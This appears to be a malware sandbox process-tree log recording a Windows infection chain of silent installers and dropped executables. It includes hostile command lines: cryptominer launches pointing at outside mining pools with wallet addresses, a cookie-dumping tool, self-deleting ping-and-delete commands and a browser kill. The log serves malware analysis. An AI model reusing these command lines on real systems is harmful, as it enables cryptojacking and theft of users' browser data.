C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 6203⤵
- Program crash
PID:2480
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-D7HAF.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-D7HAF.tmp\vpn.tmp" /SL5="$2032E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\higtnac13oq\vpn.exe" /silent /subid=4821⤵PID:5696
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "2⤵PID:4544
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09013⤵PID:4300
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "2⤵PID:7048
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09013⤵PID:5300
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall2⤵PID:3572
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install2⤵PID:3608
-
-
C:\Users\Admin\AppData\Local\Temp\is-303BK.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-303BK.tmp\IBInstaller_97039.tmp" /SL5="$2034C,12322324,721408,C:\Users\Admin\AppData\Local\Temp\jsigpk3eda4\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq1⤵PID:5756
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=970392⤵PID:5956
-
-
C:\Users\Admin\AppData\Local\Temp\is-HAJ43.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-HAJ43.tmp\{app}\chrome_proxy.exe"2⤵PID:6012
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-HAJ43.tmp\{app}\chrome_proxy.exe"3⤵PID:744
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 44⤵
- Runs ping.exe
PID:6040
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-BR4JS.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-BR4JS.tmp\Setup3310.tmp" /SL5="$30208,138429,56832,C:\Users\Admin\AppData\Local\Temp\4izeh0nvbjq\Setup3310.exe" /Verysilent /subid=5771⤵PID:5592
-
C:\Users\Admin\AppData\Local\Temp\is-PTNNN.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PTNNN.tmp\Setup.exe" /Verysilent2⤵PID:6208
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"3⤵PID:6444
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5064
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4480
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"3⤵PID:6496
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"3⤵PID:6516
-
C:\Users\Admin\AppData\Local\Temp\is-05MDP.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-05MDP.tmp\LabPicV3.tmp" /SL5="$4035E,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"4⤵PID:6752
-
C:\Users\Admin\AppData\Local\Temp\is-SV1LD.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-SV1LD.tmp\ppppppfy.exe" /S /UID=lab2145⤵PID:6740
-
C:\Users\Admin\AppData\Local\Temp\4a-a015d-401-b9bb7-738c5b256be43\Haekadoshozhe.exe"C:\Users\Admin\AppData\Local\Temp\4a-a015d-401-b9bb7-738c5b256be43\Haekadoshozhe.exe"6⤵PID:4264
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nhiiojtz.ngi\md6_6ydj.exe & exit7⤵PID:6148
-
C:\Users\Admin\AppData\Local\Temp\nhiiojtz.ngi\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\nhiiojtz.ngi\md6_6ydj.exe8⤵PID:7616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tmlaauja.5xd\askinstall31.exe & exit7⤵PID:6880
-
C:\Users\Admin\AppData\Local\Temp\tmlaauja.5xd\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\tmlaauja.5xd\askinstall31.exe8⤵PID:8092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xrnew3pc.kz0\toolspab1.exe & exit7⤵PID:7368
-
C:\Users\Admin\AppData\Local\Temp\xrnew3pc.kz0\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\xrnew3pc.kz0\toolspab1.exe8⤵PID:8172
-
C:\Users\Admin\AppData\Local\Temp\xrnew3pc.kz0\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\xrnew3pc.kz0\toolspab1.exe9⤵PID:7972
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wuc2uanp.b5b\setup_10.2_mix.exe & exit7⤵PID:8072
-
C:\Users\Admin\AppData\Local\Temp\wuc2uanp.b5b\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\wuc2uanp.b5b\setup_10.2_mix.exe8⤵PID:7568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pljtbluk.rm4\GcleanerWW.exe /mixone & exit7⤵PID:7644
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\55ylykwz.u22\app.exe /8-2222 & exit7⤵PID:8096
-
C:\Users\Admin\AppData\Local\Temp\55ylykwz.u22\app.exeC:\Users\Admin\AppData\Local\Temp\55ylykwz.u22\app.exe /8-22228⤵PID:8100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\itcaauy1.r0q\file.exe & exit7⤵PID:6004
-
C:\Users\Admin\AppData\Local\Temp\itcaauy1.r0q\file.exeC:\Users\Admin\AppData\Local\Temp\itcaauy1.r0q\file.exe8⤵PID:5804
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"9⤵PID:6708
-
C:\Users\Admin\AppData\Local\Temp\GSNX3UZKCP\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\GSNX3UZKCP\multitimer.exe" 0 3060197d33d91c80.94013368 0 10110⤵PID:4756
-
C:\Users\Admin\AppData\Local\Temp\GSNX3UZKCP\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\GSNX3UZKCP\multitimer.exe" 1 3.1617397130.6067858a57311 10111⤵PID:3860
-
C:\Users\Admin\AppData\Local\Temp\GSNX3UZKCP\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\GSNX3UZKCP\multitimer.exe" 2 3.1617397130.6067858a5731112⤵PID:6484
-
C:\Users\Admin\AppData\Local\Temp\dsbeepez30x\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\dsbeepez30x\Setup3310.exe" /Verysilent /subid=57713⤵PID:3064
-
C:\Users\Admin\AppData\Local\Temp\is-105GO.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-105GO.tmp\Setup3310.tmp" /SL5="$7036E,138429,56832,C:\Users\Admin\AppData\Local\Temp\dsbeepez30x\Setup3310.exe" /Verysilent /subid=57714⤵PID:5640
-
C:\Users\Admin\AppData\Local\Temp\is-M17VA.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-M17VA.tmp\Setup.exe" /Verysilent15⤵PID:8328
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jg4gfwjddic\app.exe"C:\Users\Admin\AppData\Local\Temp\jg4gfwjddic\app.exe" /8-2313⤵PID:6436
-
-
C:\Users\Admin\AppData\Local\Temp\4gjkpjai0kg\u01iejlaacx.exe"C:\Users\Admin\AppData\Local\Temp\4gjkpjai0kg\u01iejlaacx.exe" /ustwo INSTALL13⤵PID:5908
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5908 -s 88414⤵
- Program crash
PID:7176
-
-
-
C:\Users\Admin\AppData\Local\Temp\icmf1egbzqd\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\icmf1egbzqd\cpyrix.exe" /VERYSILENT13⤵PID:4828
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe14⤵PID:3500
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe14⤵PID:4972
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"15⤵PID:9004
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub15⤵PID:9064
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe16⤵PID:6840
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3pl1bj3v4ex\vict.exe"C:\Users\Admin\AppData\Local\Temp\3pl1bj3v4ex\vict.exe" /VERYSILENT /id=53513⤵PID:8024
-
C:\Users\Admin\AppData\Local\Temp\is-B92FF.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-B92FF.tmp\vict.tmp" /SL5="$300CC,870426,780800,C:\Users\Admin\AppData\Local\Temp\3pl1bj3v4ex\vict.exe" /VERYSILENT /id=53514⤵PID:5464
-
C:\Users\Admin\AppData\Local\Temp\is-0UHGC.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-0UHGC.tmp\win1host.exe" 53515⤵PID:2408
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yfz5yqocphd\vpn.exe"C:\Users\Admin\AppData\Local\Temp\yfz5yqocphd\vpn.exe" /silent /subid=48213⤵PID:7580
-
C:\Users\Admin\AppData\Local\Temp\is-081PG.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-081PG.tmp\vpn.tmp" /SL5="$50624,15170975,270336,C:\Users\Admin\AppData\Local\Temp\yfz5yqocphd\vpn.exe" /silent /subid=48214⤵PID:8772
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Z8HPFJQHOG\setups.exe"C:\Users\Admin\AppData\Local\Temp\Z8HPFJQHOG\setups.exe" ll10⤵PID:5488
-
C:\Users\Admin\AppData\Local\Temp\is-VKFC0.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-VKFC0.tmp\setups.tmp" /SL5="$2061A,635399,250368,C:\Users\Admin\AppData\Local\Temp\Z8HPFJQHOG\setups.exe" ll11⤵PID:6312
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"9⤵PID:7312
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"9⤵PID:3420
-
C:\Users\Admin\AppData\Roaming\4E65.tmp.exe"C:\Users\Admin\AppData\Roaming\4E65.tmp.exe"10⤵PID:7468
-
C:\Users\Admin\AppData\Roaming\4E65.tmp.exe"C:\Users\Admin\AppData\Roaming\4E65.tmp.exe"11⤵PID:6424
-
-
-
C:\Users\Admin\AppData\Roaming\550E.tmp.exe"C:\Users\Admin\AppData\Roaming\550E.tmp.exe"10⤵PID:8036
-
-
C:\Users\Admin\AppData\Roaming\54A0.tmp.exe"C:\Users\Admin\AppData\Roaming\54A0.tmp.exe"10⤵PID:3160
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999911⤵PID:8832
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999911⤵PID:8792
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"10⤵PID:8896
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.111⤵
- Runs ping.exe
PID:8316
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"9⤵PID:8956
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dr5fzj21.3ew\Four.exe & exit7⤵PID:6956
-
C:\Users\Admin\AppData\Local\Temp\dr5fzj21.3ew\Four.exeC:\Users\Admin\AppData\Local\Temp\dr5fzj21.3ew\Four.exe8⤵PID:1544
-
C:\Users\Admin\AppData\Local\Temp\TT2HHIUVEK\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\TT2HHIUVEK\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1049⤵PID:8144
-
C:\Users\Admin\AppData\Local\Temp\TT2HHIUVEK\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\TT2HHIUVEK\multitimer.exe" 1 3.1617397128.6067858874b84 10410⤵PID:5636
-
C:\Users\Admin\AppData\Local\Temp\TT2HHIUVEK\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\TT2HHIUVEK\multitimer.exe" 2 3.1617397128.6067858874b8411⤵PID:6332
-
C:\Users\Admin\AppData\Local\Temp\5wb4rvu3s5e\hv1zamvtadl.exe"C:\Users\Admin\AppData\Local\Temp\5wb4rvu3s5e\hv1zamvtadl.exe" /ustwo INSTALL12⤵PID:6780
-
-
C:\Users\Admin\AppData\Local\Temp\2acpmiqoavm\vpn.exe"C:\Users\Admin\AppData\Local\Temp\2acpmiqoavm\vpn.exe" /silent /subid=48212⤵PID:9212
-
C:\Users\Admin\AppData\Local\Temp\is-AE5OM.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-AE5OM.tmp\vpn.tmp" /SL5="$20648,15170975,270336,C:\Users\Admin\AppData\Local\Temp\2acpmiqoavm\vpn.exe" /silent /subid=48213⤵PID:5332
-
-
-
C:\Users\Admin\AppData\Local\Temp\pd32kkd31tf\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\pd32kkd31tf\cpyrix.exe" /VERYSILENT12⤵PID:8868
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe13⤵PID:5164
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe13⤵PID:4396
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"14⤵PID:2276
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub14⤵PID:6188
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wknvr34i1mc\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\wknvr34i1mc\Setup3310.exe" /Verysilent /subid=57712⤵PID:5328
-
C:\Users\Admin\AppData\Local\Temp\is-610OI.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-610OI.tmp\Setup3310.tmp" /SL5="$604D8,138429,56832,C:\Users\Admin\AppData\Local\Temp\wknvr34i1mc\Setup3310.exe" /Verysilent /subid=57713⤵PID:8116
-
C:\Users\Admin\AppData\Local\Temp\is-ICFD7.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-ICFD7.tmp\Setup.exe" /Verysilent14⤵PID:8804
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ulfbezdvr0p\vict.exe"C:\Users\Admin\AppData\Local\Temp\ulfbezdvr0p\vict.exe" /VERYSILENT /id=53512⤵PID:4300
-
C:\Users\Admin\AppData\Local\Temp\is-3KVK0.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-3KVK0.tmp\vict.tmp" /SL5="$20598,870426,780800,C:\Users\Admin\AppData\Local\Temp\ulfbezdvr0p\vict.exe" /VERYSILENT /id=53513⤵PID:8572
-
C:\Users\Admin\AppData\Local\Temp\is-NKQBK.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-NKQBK.tmp\win1host.exe" 53514⤵PID:7788
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\peuszhiemqu\app.exe"C:\Users\Admin\AppData\Local\Temp\peuszhiemqu\app.exe" /8-2312⤵PID:2196
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\F88WF5D950\setups.exe"C:\Users\Admin\AppData\Local\Temp\F88WF5D950\setups.exe" ll9⤵PID:684
-
C:\Users\Admin\AppData\Local\Temp\is-TQER4.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-TQER4.tmp\setups.tmp" /SL5="$30726,635399,250368,C:\Users\Admin\AppData\Local\Temp\F88WF5D950\setups.exe" ll10⤵PID:4524
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\44-62f69-726-64d90-854e83224c568\Nytivizhifo.exe"C:\Users\Admin\AppData\Local\Temp\44-62f69-726-64d90-854e83224c568\Nytivizhifo.exe"6⤵PID:4832
-
-
C:\Program Files\Windows Multimedia Platform\SKMBESAZVY\prolab.exe"C:\Program Files\Windows Multimedia Platform\SKMBESAZVY\prolab.exe" /VERYSILENT6⤵PID:4960
-
C:\Users\Admin\AppData\Local\Temp\is-KI8Q1.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-KI8Q1.tmp\prolab.tmp" /SL5="$202B0,575243,216576,C:\Program Files\Windows Multimedia Platform\SKMBESAZVY\prolab.exe" /VERYSILENT7⤵PID:5296
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"3⤵PID:6540
-
C:\Users\Admin\AppData\Local\Temp\is-CPRH3.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-CPRH3.tmp\lylal220.tmp" /SL5="$303C6,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"4⤵PID:6892
-
C:\Users\Admin\AppData\Local\Temp\is-2V1N2.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-2V1N2.tmp\Microsoft.exe" /S /UID=lylal2205⤵PID:6916
-
C:\Program Files\Common Files\ARGNUBZBCM\irecord.exe"C:\Program Files\Common Files\ARGNUBZBCM\irecord.exe" /VERYSILENT6⤵PID:2208
-
C:\Users\Admin\AppData\Local\Temp\is-64QM5.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-64QM5.tmp\irecord.tmp" /SL5="$50070,6265333,408064,C:\Program Files\Common Files\ARGNUBZBCM\irecord.exe" /VERYSILENT7⤵PID:5176
-
-
-
C:\Users\Admin\AppData\Local\Temp\c7-0d54d-0e4-daf8d-8a18d4fbad9df\Joqyzhasire.exe"C:\Users\Admin\AppData\Local\Temp\c7-0d54d-0e4-daf8d-8a18d4fbad9df\Joqyzhasire.exe"6⤵PID:6792
-
-
C:\Users\Admin\AppData\Local\Temp\77-0ee36-1ae-b7ba7-b04d1b9dc3b07\Vaekerosaepi.exe"C:\Users\Admin\AppData\Local\Temp\77-0ee36-1ae-b7ba7-b04d1b9dc3b07\Vaekerosaepi.exe"6⤵PID:4632
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ang2mjio.f2d\md6_6ydj.exe & exit7⤵PID:2308
-
C:\Users\Admin\AppData\Local\Temp\ang2mjio.f2d\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\ang2mjio.f2d\md6_6ydj.exe8⤵PID:7584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hnqls52p.efp\askinstall31.exe & exit7⤵PID:3776
-
C:\Users\Admin\AppData\Local\Temp\hnqls52p.efp\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\hnqls52p.efp\askinstall31.exe8⤵PID:7820
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:6620
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:3040
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q02ltuza.4gi\toolspab1.exe & exit7⤵PID:2356
-
C:\Users\Admin\AppData\Local\Temp\q02ltuza.4gi\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\q02ltuza.4gi\toolspab1.exe8⤵PID:8028
-
C:\Users\Admin\AppData\Local\Temp\q02ltuza.4gi\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\q02ltuza.4gi\toolspab1.exe9⤵PID:7604
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\thzf0tj0.s40\setup_10.2_mix.exe & exit7⤵PID:7504
-
C:\Users\Admin\AppData\Local\Temp\thzf0tj0.s40\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\thzf0tj0.s40\setup_10.2_mix.exe8⤵PID:7832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vv0opg3j.zcb\GcleanerWW.exe /mixone & exit7⤵PID:7020
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\miak2ycl.in3\app.exe /8-2222 & exit7⤵PID:5236
-
C:\Users\Admin\AppData\Local\Temp\miak2ycl.in3\app.exeC:\Users\Admin\AppData\Local\Temp\miak2ycl.in3\app.exe /8-22228⤵PID:4944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cknfro3w.340\file.exe & exit7⤵PID:6556
-
C:\Users\Admin\AppData\Local\Temp\cknfro3w.340\file.exeC:\Users\Admin\AppData\Local\Temp\cknfro3w.340\file.exe8⤵PID:7476
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"9⤵PID:6092
-
C:\Users\Admin\AppData\Local\Temp\A2VMXIKVRZ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\A2VMXIKVRZ\multitimer.exe" 0 3060197d33d91c80.94013368 0 10110⤵PID:8136
-
C:\Users\Admin\AppData\Local\Temp\A2VMXIKVRZ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\A2VMXIKVRZ\multitimer.exe" 1 3.1617397124.606785843cac6 10111⤵PID:3996
-
C:\Users\Admin\AppData\Local\Temp\A2VMXIKVRZ\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\A2VMXIKVRZ\multitimer.exe" 2 3.1617397124.606785843cac612⤵PID:3124
-
C:\Users\Admin\AppData\Local\Temp\3pictpkqza3\vict.exe"C:\Users\Admin\AppData\Local\Temp\3pictpkqza3\vict.exe" /VERYSILENT /id=53513⤵PID:8368
-
C:\Users\Admin\AppData\Local\Temp\is-TSULJ.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-TSULJ.tmp\vict.tmp" /SL5="$2009C,870426,780800,C:\Users\Admin\AppData\Local\Temp\3pictpkqza3\vict.exe" /VERYSILENT /id=53514⤵PID:4472
-
C:\Users\Admin\AppData\Local\Temp\is-E07B7.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-E07B7.tmp\win1host.exe" 53515⤵PID:5680
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4a0v2axtzwa\app.exe"C:\Users\Admin\AppData\Local\Temp\4a0v2axtzwa\app.exe" /8-2313⤵PID:8408
-
-
C:\Users\Admin\AppData\Local\Temp\x0oxpivsg3d\u2tii3qc2ei.exe"C:\Users\Admin\AppData\Local\Temp\x0oxpivsg3d\u2tii3qc2ei.exe" /ustwo INSTALL13⤵PID:7696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7696 -s 65214⤵
- Program crash
PID:7300
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7696 -s 67614⤵
- Program crash
PID:7460
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7696 -s 62814⤵
- Program crash
PID:7668
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7696 -s 96014⤵
- Program crash
PID:5800
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7696 -s 85614⤵
- Program crash
PID:9184
-
-
-
C:\Users\Admin\AppData\Local\Temp\ezx3frfd03i\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ezx3frfd03i\Setup3310.exe" /Verysilent /subid=57713⤵PID:8656
-
C:\Users\Admin\AppData\Local\Temp\is-UR4B6.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-UR4B6.tmp\Setup3310.tmp" /SL5="$300DE,138429,56832,C:\Users\Admin\AppData\Local\Temp\ezx3frfd03i\Setup3310.exe" /Verysilent /subid=57714⤵PID:8916
-
C:\Users\Admin\AppData\Local\Temp\is-31LDN.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-31LDN.tmp\Setup.exe" /Verysilent15⤵PID:6408
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5xqwmx1pipg\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\5xqwmx1pipg\cpyrix.exe" /VERYSILENT13⤵PID:6396
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe14⤵PID:8288
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"15⤵PID:7292
-
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"15⤵PID:3696
-
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"15⤵PID:5384
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe14⤵PID:6036
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"15⤵PID:4740
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub15⤵PID:6848
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe16⤵PID:2272
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\o2c2u3t3w5q\vpn.exe"C:\Users\Admin\AppData\Local\Temp\o2c2u3t3w5q\vpn.exe" /silent /subid=48213⤵PID:7296
-
C:\Users\Admin\AppData\Local\Temp\is-I92U5.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-I92U5.tmp\vpn.tmp" /SL5="$200FA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\o2c2u3t3w5q\vpn.exe" /silent /subid=48214⤵PID:4372
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\LOROTD5QED\setups.exe"C:\Users\Admin\AppData\Local\Temp\LOROTD5QED\setups.exe" ll10⤵PID:8156
-
C:\Users\Admin\AppData\Local\Temp\is-ODHGN.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-ODHGN.tmp\setups.tmp" /SL5="$A02F2,635399,250368,C:\Users\Admin\AppData\Local\Temp\LOROTD5QED\setups.exe" ll11⤵PID:5144
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"9⤵PID:4336
-
